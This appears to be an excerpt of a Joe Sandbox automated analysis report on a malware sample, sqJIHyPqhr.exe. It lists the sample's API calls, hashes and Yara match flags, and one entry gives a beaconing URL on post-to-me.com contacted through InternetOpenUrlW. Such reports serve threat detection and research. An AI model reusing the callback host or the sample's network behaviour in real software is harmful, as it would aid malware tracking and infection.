                                                                      • Opcode Fuzzy Hash: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
                                                                      • Instruction Fuzzy Hash: 522151B5A0131AAFCB00DF65DD499AFBBB9FF49741B104436E902F3290D7759901CBA8
                                                                      APIs
                                                                      • std::_Locinfo::_Locinfo.LIBCPMT ref: 024A50A3
                                                                      • std::_Locinfo::~_Locinfo.LIBCPMT ref: 024A50B7
                                                                      • std::_Locinfo::_Locinfo.LIBCPMT ref: 024A511C
                                                                      • __Getcoll.LIBCPMT ref: 024A512B
                                                                      • std::_Locinfo::~_Locinfo.LIBCPMT ref: 024A513B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Locinfostd::_$Locinfo::_Locinfo::~_$Getcoll
                                                                      • String ID:
                                                                      • API String ID: 2395760641-0
                                                                      • Opcode ID: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
                                                                      • Instruction ID: 132e33493d37a61ad23d39b66e92e7e738ea89c8d8244e3337d582f969db8709
                                                                      • Opcode Fuzzy Hash: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
                                                                      • Instruction Fuzzy Hash: 472166B2D18204AFDB41EFA5C4A47ADB7B1BF60715F50841FE485AB280DB749544CF91
                                                                      APIs
                                                                      • GetLastError.KERNEL32(024ADAD7,024ADAD7,00000002,024CED35,024D3951,00000000,?,024C6A05,00000002,00000000,00000000,00000000,?,024ACF88,024ADAD7,00000004), ref: 024D21CA
                                                                      • _free.LIBCMT ref: 024D21FF
                                                                      • _free.LIBCMT ref: 024D2226
                                                                      • SetLastError.KERNEL32(00000000,?,024ADAD7), ref: 024D2233
                                                                      • SetLastError.KERNEL32(00000000,?,024ADAD7), ref: 024D223C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLast$_free
                                                                      • String ID:
                                                                      • API String ID: 3170660625-0
                                                                      • Opcode ID: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                                      • Instruction ID: 8849f2efac1327e62b858a0a22b499c81cef013eaee00acc32b23fbe8b2ea7ef
                                                                      • Opcode Fuzzy Hash: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                                      • Instruction Fuzzy Hash: EA01F9362457003B9712AB356C64F2F262EABD2B72710013FFC1596392EFF08806852A
                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
                                                                      • _free.LIBCMT ref: 00431F98
                                                                      • _free.LIBCMT ref: 00431FBF
                                                                      • SetLastError.KERNEL32(00000000), ref: 00431FCC
                                                                      • SetLastError.KERNEL32(00000000), ref: 00431FD5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$_free
                                                                      • String ID:
                                                                      • API String ID: 3170660625-0
                                                                      • Opcode ID: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                                      • Instruction ID: 0958b0acb89a9b0c851ef96239832ae32a3192186555c964954bc496c6487c7c
                                                                      • Opcode Fuzzy Hash: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                                      • Instruction Fuzzy Hash: EA01F936249A007BD7122B266C45D2B262DEBD977AF21212FF804933F2EF6C8D02412D
                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,?,024CA9EC,?,00000000,?,024CCDE6,024A247E,00000000,?,00451F20), ref: 024D2145
                                                                      • _free.LIBCMT ref: 024D2178
                                                                      • _free.LIBCMT ref: 024D21A0
                                                                      • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024D21AD
                                                                      • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024D21B9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLast$_free
                                                                      • String ID:
                                                                      • API String ID: 3170660625-0
                                                                      • Opcode ID: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                                      • Instruction ID: 92083e99463eef88a493b12fe4d5dc76b9a37604355ea29bce682a02996fd1d8
                                                                      • Opcode Fuzzy Hash: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                                      • Instruction Fuzzy Hash: A7F0A93514460037D3176735AC28B1F262A5FC2F63F25412FFD1993391EFE18512852A
                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                      • _free.LIBCMT ref: 00431F11
                                                                      • _free.LIBCMT ref: 00431F39
                                                                      • SetLastError.KERNEL32(00000000), ref: 00431F46
                                                                      • SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$_free
                                                                      • String ID:
                                                                      • API String ID: 3170660625-0
                                                                      • Opcode ID: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                                      • Instruction ID: 3b026b3c5eee41f9d7def55204e2a076619a9c86630fc827cc9980c008d650a8
                                                                      • Opcode Fuzzy Hash: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                                      • Instruction Fuzzy Hash: 6BF02D3A608A0077D61637356C06B1B26199FC9B26F31112FF815933F2EF2DC902452D
                                                                      APIs
                                                                        • Part of subcall function 024B29A4: TlsGetValue.KERNEL32(?,?,024B0DC2,024B2ECF,00000000,?,024B0DA0,?,?,?,00000000,?,00000000), ref: 024B29AA
                                                                      • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 024B7BB1
                                                                        • Part of subcall function 024C121A: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 024C1241
                                                                        • Part of subcall function 024C121A: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 024C125A
                                                                        • Part of subcall function 024C121A: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 024C12D0
                                                                        • Part of subcall function 024C121A: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 024C12D8
                                                                      • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 024B7BBF
                                                                      • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 024B7BC9
                                                                      • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 024B7BD3
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024B7BF1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                                      • String ID:
                                                                      • API String ID: 4266703842-0
                                                                      • Opcode ID: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                                      • Instruction ID: cac31cb7e2f77960504ee46ec1cadcd83f6a60f9e2d9d6a85c4f454143adee18
                                                                      • Opcode Fuzzy Hash: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                                      • Instruction Fuzzy Hash: 35F0C23660461867CE17F77688509EEF62BDFC0B18B10416FD80153350DF649E058EB2
                                                                      APIs
                                                                        • Part of subcall function 0041273D: TlsGetValue.KERNEL32(?,?,00410B5B,00412C68,00000000,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412743
                                                                      • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0041794A
                                                                        • Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00420FDA
                                                                        • Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00420FF3
                                                                        • Part of subcall function 00420FB3: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00421069
                                                                        • Part of subcall function 00420FB3: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00421071
                                                                      • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00417958
                                                                      • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00417962
                                                                      • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 0041796C
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0041798A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                                      • String ID:
                                                                      • API String ID: 4266703842-0
                                                                      • Opcode ID: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                                      • Instruction ID: 523e498e96a622df23a613ee45563367b5d22c9a8c27bf88e83bdf0efd96127b
                                                                      • Opcode Fuzzy Hash: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                                      • Instruction Fuzzy Hash: B0F04C31A0021427CE15B7269912AEEB7269F80724B40012FF40183382DF6C9E9987CD
                                                                      APIs
                                                                      • _free.LIBCMT ref: 024DA0C4
                                                                        • Part of subcall function 024D36D1: HeapFree.KERNEL32(00000000,00000000,?,024DA35F,?,00000000,?,00000000,?,024DA603,?,00000007,?,?,024DA9F7,?), ref: 024D36E7
                                                                        • Part of subcall function 024D36D1: GetLastError.KERNEL32(?,?,024DA35F,?,00000000,?,00000000,?,024DA603,?,00000007,?,?,024DA9F7,?,?), ref: 024D36F9
                                                                      • _free.LIBCMT ref: 024DA0D6
                                                                      • _free.LIBCMT ref: 024DA0E8
                                                                      • _free.LIBCMT ref: 024DA0FA
                                                                      • _free.LIBCMT ref: 024DA10C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                      • Instruction ID: 882ee1982e7aeb90853af9030366d3b6d112c9d6fa0e5ec3dbbc31a89a03b9b0
                                                                      • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                      • Instruction Fuzzy Hash: 27F06232605220AB8771EF55F8D6C0B77DAAA04750764095BF008D7B11CB71F890CE5A
                                                                      APIs
                                                                      • _free.LIBCMT ref: 00439E5D
                                                                        • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                        • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                      • _free.LIBCMT ref: 00439E6F
                                                                      • _free.LIBCMT ref: 00439E81
                                                                      • _free.LIBCMT ref: 00439E93
                                                                      • _free.LIBCMT ref: 00439EA5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                      • Instruction ID: 23fbe02493372c4549fca1a108de89c04d7fed3b0c796059023c71110852f737
                                                                      • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                      • Instruction Fuzzy Hash: 35F04F72505600ABA620EF59E483C1773D9BB08B11F68694BF00CD7751CB79FC808B5D
                                                                      APIs
                                                                      • _free.LIBCMT ref: 024D19AF
                                                                        • Part of subcall function 024D36D1: HeapFree.KERNEL32(00000000,00000000,?,024DA35F,?,00000000,?,00000000,?,024DA603,?,00000007,?,?,024DA9F7,?), ref: 024D36E7
                                                                        • Part of subcall function 024D36D1: GetLastError.KERNEL32(?,?,024DA35F,?,00000000,?,00000000,?,024DA603,?,00000007,?,?,024DA9F7,?,?), ref: 024D36F9
                                                                      • _free.LIBCMT ref: 024D19C1
                                                                      • _free.LIBCMT ref: 024D19D4
                                                                      • _free.LIBCMT ref: 024D19E5
                                                                      • _free.LIBCMT ref: 024D19F6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                      • Instruction ID: 020931c347d2c62dd21e2570ef4b29f71a76ef447d2a9967f5aad5f8accc4a4b
                                                                      • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                      • Instruction Fuzzy Hash: 6CF01D74D043109B9F616F15BD904053F61AF09B2270002ABF406977B2C774E862DF8E
                                                                      APIs
                                                                      • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 024BCF36
                                                                      • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 024BCF67
                                                                      • GetCurrentThread.KERNEL32 ref: 024BCF70
                                                                      • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 024BCF83
                                                                      • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 024BCF8C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                                      • String ID:
                                                                      • API String ID: 2583373041-0
                                                                      • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                      • Instruction ID: b3b6438bc59fa6f001ddf6d4a55259c4dee4f28243aacb12f69b7f0401727091
                                                                      • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                      • Instruction Fuzzy Hash: 53F03036600900DFCA27EF62EA949FBB7B6AFC4610350459FE58B07690CF21A947DB71
                                                                      APIs
                                                                      • _free.LIBCMT ref: 00431748
                                                                        • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                        • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                      • _free.LIBCMT ref: 0043175A
                                                                      • _free.LIBCMT ref: 0043176D
                                                                      • _free.LIBCMT ref: 0043177E
                                                                      • _free.LIBCMT ref: 0043178F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                      • Instruction ID: 2553f371f7fcd8ed3987e2465633d6fecf7e22fdbd4e0dd0ef6c31112bbbdc45
                                                                      • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                      • Instruction Fuzzy Hash: 5EF030B0D007509BAA226F19AC414053B60AF2D727B04626BF41797273C738D952DF8E
                                                                      APIs
                                                                      • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0041CCCF
                                                                      • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0041CD00
                                                                      • GetCurrentThread.KERNEL32 ref: 0041CD09
                                                                      • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0041CD1C
                                                                      • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0041CD25
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                                      • String ID:
                                                                      • API String ID: 2583373041-0
                                                                      • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                      • Instruction ID: 58cdd2c6a275a740aba70ab995622b5563c0a51640fa297b0aaaaf7b877cb5c4
                                                                      • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                      • Instruction Fuzzy Hash: 73F082B6200500AB8625EF62F9518F67775AFC4715310091EE44B46651CF28A982D76A
                                                                      APIs
                                                                      • InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 024A2E8E
                                                                        • Part of subcall function 024A1321: _wcslen.LIBCMT ref: 024A1328
                                                                        • Part of subcall function 024A1321: _wcslen.LIBCMT ref: 024A1344
                                                                      • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 024A30A1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: InternetOpen_wcslen
                                                                      • String ID: &cc=DE$https://post-to-me.com/track_prt.php?sub=
                                                                      • API String ID: 3381584094-4083784958
                                                                      • Opcode ID: 8928d350cf755053b5b232c8fa9b688d7be6d8b3691c9b81f216a741e9bb68ff
                                                                      • Instruction ID: 1588d28ff87476eb7752d38a8c28b080ddefd44ee739cc46a7c9e4707613687f
                                                                      • Opcode Fuzzy Hash: 8928d350cf755053b5b232c8fa9b688d7be6d8b3691c9b81f216a741e9bb68ff
                                                                      • Instruction Fuzzy Hash: 43515195E55344A8E320EFB0BC56B723378FF58712F10643BD518CB2B2E7A19984871E
                                                                      APIs
                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 024C896A
                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 024C8A23
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                      • String ID: fB$csm
                                                                      • API String ID: 3480331319-1586063737
                                                                      • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                      • Instruction ID: 48f645909cc2dd73e768aaf9b1fe1f86295fd31cbcc1c2a3b01f66e5ebcdc08a
                                                                      • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                      • Instruction Fuzzy Hash: 8C41D638A002489BCF55DF6DC844AAF7BA5AF45328F24816FD9155B391D7329901CF91
                                                                      APIs
                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\sqJIHyPqhr.exe,00000104), ref: 024CF9BA
                                                                      • _free.LIBCMT ref: 024CFA85
                                                                      • _free.LIBCMT ref: 024CFA8F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free$FileModuleName
                                                                      • String ID: C:\Users\user\Desktop\sqJIHyPqhr.exe
                                                                      • API String ID: 2506810119-2110814710
                                                                      • Opcode ID: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                                      • Instruction ID: 6581aea0a8cce75bbcb65e8b62c5d1056867072f303436d1770489a78802dc81
                                                                      • Opcode Fuzzy Hash: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                                      • Instruction Fuzzy Hash: 63319179A00218EFCB61DF99DC8099EFBFEEF89710B21406FE80497611D7759A44CB90
                                                                      APIs
                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\sqJIHyPqhr.exe,00000104), ref: 0042F753
                                                                      • _free.LIBCMT ref: 0042F81E
                                                                      • _free.LIBCMT ref: 0042F828
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: _free$FileModuleName
                                                                      • String ID: C:\Users\user\Desktop\sqJIHyPqhr.exe
                                                                      • API String ID: 2506810119-2110814710
                                                                      • Opcode ID: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                                      • Instruction ID: fa775896cd6cad66ce7c6a69fb092310498b308cf57115ff02981d914fd4ae43
                                                                      • Opcode Fuzzy Hash: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                                      • Instruction Fuzzy Hash: 8F31B371B00228AFDB21DF9AAC8199FBBFCEF95304B90407BE80497211D7749E45CB98
                                                                      APIs
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024AC8DE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Exception@8Throw
                                                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                      • API String ID: 2005118841-1866435925
                                                                      • Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                                      • Instruction ID: 187907d8abdc134cd430c3ca2f84676dece580684b71ee6fdc1f5c34ddd58064
                                                                      • Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                                      • Instruction Fuzzy Hash: 96F05673C405086BCB84D554CCD1BEF3394AF35316F14806FDD516B182E7649945CF64
                                                                      APIs
                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
                                                                      • GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
                                                                      • ExitThread.KERNEL32 ref: 0042DFDA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                                      • String ID: F(@
                                                                      • API String ID: 3213686812-2698495834
                                                                      • Opcode ID: 6ee01334007aa82adf3d340a5c4addfef0f1634db691a06ca807f035a44bf27a
                                                                      • Instruction ID: 460a7fcc700e9d4f467f0dc096aafbc476958de37b1de63dc97b6f39ac05addf
                                                                      • Opcode Fuzzy Hash: 6ee01334007aa82adf3d340a5c4addfef0f1634db691a06ca807f035a44bf27a
                                                                      • Instruction Fuzzy Hash: 05F09772B8431675FA203B727D0BBAB15140F10B49F8A043FBE09D91C3DEACC550806E
                                                                      APIs
                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
                                                                      • GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
                                                                      • ExitThread.KERNEL32 ref: 0042DFDA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                                      • String ID: F(@
                                                                      • API String ID: 3213686812-2698495834
                                                                      • Opcode ID: 91ee149d9fba369ee1c9d7eb174c136b293f55629d39eb1465d14400ab2c345a
                                                                      • Instruction ID: f8bb832dc8ad97d2a89c5ed14b9cd2946ef4cec1cab2ecc574275c3dd80a03eb
                                                                      • Opcode Fuzzy Hash: 91ee149d9fba369ee1c9d7eb174c136b293f55629d39eb1465d14400ab2c345a
                                                                      • Instruction Fuzzy Hash: 50F05571BC431A36FA203BA17D0BB961A150F14B49F5A043BBF09991C3DAAC8550406E
                                                                      APIs
                                                                      • Concurrency::details::SchedulerProxy::DestroyVirtualProcessorRoot.LIBCONCRT ref: 004242F9
                                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042430B
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00424319
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: Concurrency::details::DestroyException@8ProcessorProxy::RootSchedulerThrowVirtualstd::invalid_argument::invalid_argument
